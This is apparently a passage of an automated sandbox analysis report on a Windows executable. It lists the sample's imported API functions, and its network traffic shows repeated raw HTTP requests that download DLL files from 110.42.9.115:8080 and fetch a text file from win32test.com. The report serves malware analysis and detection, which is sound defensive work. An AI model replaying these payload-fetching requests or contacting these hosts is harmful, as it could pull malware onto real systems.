0x60b660 SetClipboardData
0x60b664 OpenClipboard
0x60b668 GetClipboardData
0x60b66c CloseClipboard
0x60b670 wsprintfA
0x60b674 WaitForInputIdle
0x60b678 SendDlgItemMessageA
0x60b67c MapWindowPoints
0x60b680 AdjustWindowRectEx
0x60b684 GetScrollPos
0x60b688 RegisterClassA
0x60b68c CreateWindowExA
0x60b690 GetClassLongA
0x60b694 GetMessageTime
0x60b698 GetLastActivePopup
0x60b6a0 GetWindowPlacement
0x60b6a4 EndDialog
0x60b6ac DestroyWindow
0x60b6b0 EndPaint
0x60b6b4 BeginPaint
0x60b6b8 CharUpperA
0x60b6c0 GetForegroundWindow
0x60b6c4 CheckMenuItem
0x60b6c8 GrayStringA
0x60b6cc DrawTextA
0x60b6d0 TabbedTextOutA
0x60b6d4 WindowFromDC
0x60b6d8 IsMenu
0x60b6dc DrawMenuBar
0x60b6e0 RemovePropA
0x60b6e4 CallWindowProcA
0x60b6e8 GetPropA
0x60b6ec SetPropA
0x60b6f0 GetSysColorBrush
0x60b6f4 GetWindowDC
0x60b6f8 GetMenuItemInfoA
0x60b6fc CreateIconIndirect
0x60b700 GetIconInfo
0x60b704 CopyIcon
0x60b708 LoadStringA
0x60b70c SetWindowTextA
0x60b710 UnhookWindowsHookEx
0x60b714 SetWindowsHookExA
0x60b718 CallNextHookEx
0x60b71c GetMenuItemCount
0x60b720 GetMenuItemRect
0x60b724 GetMenuItemID
0x60b728 GetMenuState
0x60b72c DrawStateA
0x60b730 FrameRect
0x60b734 UnregisterClassA
0x60b738 GetWindowTextA
0x60b73c FindWindowExA
0x60b740 GetDlgItem
0x60b744 FindWindowA
0x60b74c GetClassNameA
0x60b750 GetDesktopWindow
0x60b754 ScreenToClient
0x60b758 GetMessagePos
0x60b75c IntersectRect
0x60b760 GetNextDlgTabItem
Library GDI32.dll:
0x60b050 GetViewportExtEx
0x60b054 ExtSelectClipRgn
0x60b058 RoundRect
0x60b060 GetCurrentObject
0x60b064 DPtoLP
0x60b068 LPtoDP
0x60b06c Rectangle
0x60b070 Ellipse
0x60b074 SetPixelV
0x60b078 CreateCompatibleDC
0x60b07c GetPixel
0x60b080 BitBlt
0x60b084 StartPage
0x60b088 StartDocA
0x60b08c DeleteDC
0x60b090 EndDoc
0x60b094 EndPage
0x60b098 GetObjectA
0x60b09c GetStockObject
0x60b0a0 CreateFontIndirectA
0x60b0a4 CreateSolidBrush
0x60b0a8 FillRgn
0x60b0ac CreateRectRgn
0x60b0b0 CombineRgn
0x60b0b4 PatBlt
0x60b0b8 CreatePen
0x60b0bc SelectObject
0x60b0c0 CreatePatternBrush
0x60b0c4 CreateBitmap
0x60b0c8 CreateBrushIndirect
0x60b0cc CreateDCA
0x60b0d4 GetPolyFillMode
0x60b0d8 GetStretchBltMode
0x60b0dc GetROP2
0x60b0e0 GetBkColor
0x60b0e4 GetBkMode
0x60b0e8 GetTextColor
0x60b0ec CreateRoundRectRgn
0x60b0f0 CreateEllipticRgn
0x60b0f4 PathToRegion
0x60b0f8 EndPath
0x60b0fc BeginPath
0x60b100 GetWindowOrgEx
0x60b104 GetViewportOrgEx
0x60b108 GetWindowExtEx
0x60b10c GetDIBits
0x60b110 RealizePalette
0x60b114 SelectPalette
0x60b118 StretchBlt
0x60b11c CreatePalette
0x60b124 CreateDIBitmap
0x60b128 DeleteObject
0x60b12c SelectClipRgn
0x60b130 CreatePolygonRgn
0x60b134 GetClipRgn
0x60b138 SetStretchBltMode
0x60b13c ExtCreateRegion
0x60b140 SetPixel
0x60b144 CreateDIBSection
0x60b14c SetBkColor
0x60b150 TextOutA
0x60b154 SetBkMode
0x60b158 SetTextColor
0x60b15c SetDIBitsToDevice
0x60b160 FrameRgn
0x60b164 OffsetRgn
0x60b168 GetTextMetricsA
0x60b16c LineTo
0x60b170 MoveToEx
0x60b174 GetClipBox
0x60b178 PtVisible
0x60b17c RectVisible
0x60b180 ExtTextOutA
0x60b184 Escape
0x60b188 SetWindowOrgEx
0x60b18c SaveDC
0x60b190 RestoreDC
0x60b194 CreatePenIndirect
0x60b198 SetPolyFillMode
0x60b19c SetROP2
0x60b1a0 SetMapMode
0x60b1a4 SetViewportOrgEx
0x60b1a8 OffsetViewportOrgEx
0x60b1ac SetViewportExtEx
0x60b1b0 ScaleViewportExtEx
0x60b1b4 SetWindowExtEx
0x60b1b8 ScaleWindowExtEx
0x60b1bc ExcludeClipRect
0x60b1c0 GetDeviceCaps
Library MSIMG32.dll:
0x60b43c TransparentBlt
0x60b440 GradientFill
0x60b444 AlphaBlend
Library WINSPOOL.DRV:
0x60b7e4 OpenPrinterA
0x60b7e8 ClosePrinter
0x60b7ec DocumentPropertiesA
Library comdlg32.dll:
0x60b864 GetFileTitleA
0x60b868 GetSaveFileNameA
0x60b86c GetOpenFileNameA
0x60b870 ChooseFontA
0x60b874 ChooseColorA
Library ADVAPI32.dll:
0x60b000 RegCreateKeyExA
0x60b004 RegQueryValueA
0x60b008 RegSetValueExA
0x60b00c RegOpenKeyExA
0x60b010 RegCloseKey
Library SHELL32.dll:
0x60b4b4 Shell_NotifyIconA
0x60b4b8 ShellExecuteA
Library ole32.dll:
0x60b87c CLSIDFromProgID
0x60b880 OleInitialize
0x60b884 OleUninitialize
0x60b888 CLSIDFromString
0x60b88c CoCreateInstance
0x60b890 OleRun
Library OLEAUT32.dll:
0x60b458 SafeArrayAccessData
0x60b45c SafeArrayGetElement
0x60b460 VariantCopyInd
0x60b464 VariantInit
0x60b468 UnRegisterTypeLib
0x60b46c SysAllocString
0x60b470 SafeArrayDestroy
0x60b474 SafeArrayCreate
0x60b478 VariantCopy
0x60b47c VariantClear
0x60b480 VariantChangeType
0x60b484 SafeArrayGetUBound
0x60b488 SafeArrayGetLBound
0x60b48c SafeArrayGetDim
0x60b490 LoadTypeLib
0x60b494 LHashValOfNameSys
0x60b498 RegisterTypeLib
0x60b49c SafeArrayPutElement
Library COMCTL32.dll:
0x60b024 ImageList_Duplicate
0x60b028 ImageList_Destroy
0x60b02c
0x60b030 ImageList_Draw
0x60b034 _TrackMouseEvent
0x60b038 ImageList_GetIcon
0x60b044 ImageList_Read
Library WININET.dll:
0x60b768 HttpSendRequestA
0x60b76c HttpQueryInfoA
0x60b770 InternetReadFile
0x60b774 InternetConnectA
0x60b778 InternetSetOptionA
0x60b77c InternetOpenA
0x60b780 InternetCloseHandle
0x60b784 HttpOpenRequestA
0x60b788 InternetCrackUrlA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 110.42.9.115 8080
192.168.56.101 49179 110.42.9.115 8080
192.168.56.101 49180 110.42.9.115 8080
192.168.56.101 49181 110.42.9.115 8080
192.168.56.101 49182 110.42.9.115 8080
192.168.56.101 49187 110.42.9.115 8080
192.168.56.101 49188 110.42.9.115 8080
192.168.56.101 49189 110.42.9.115 8080
192.168.56.101 49190 110.42.9.115 8080
192.168.56.101 49191 110.42.9.115 8080
192.168.56.101 49204 110.42.9.115 8080
192.168.56.101 49206 110.42.9.115 8080
192.168.56.101 49207 110.42.9.115 8080
192.168.56.101 49208 110.42.9.115 8080
192.168.56.101 49209 110.42.9.115 8080
192.168.56.101 49216 110.42.9.115 8080
192.168.56.101 49217 110.42.9.115 8080
192.168.56.101 49218 110.42.9.115 8080
192.168.56.101 49219 110.42.9.115 8080
192.168.56.101 49220 110.42.9.115 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900

HTTP & HTTPS Requests

URI Data
http://110.42.9.115:8080/1/dc.dll
GET /1/dc.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=24576-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1146470-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1719705-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/dc.dll
GET /1/dc.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=73728-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/dc.dll
GET /1/dc.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=49152-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://www.win32test.com:8080/4/pro.txt
GET /4/pro.txt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.win32test.com:8080

http://110.42.9.115:8080/1/gzip.dll
GET /1/gzip.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=25804-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=2292940-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/socket.dll
GET /1/socket.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=881868-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.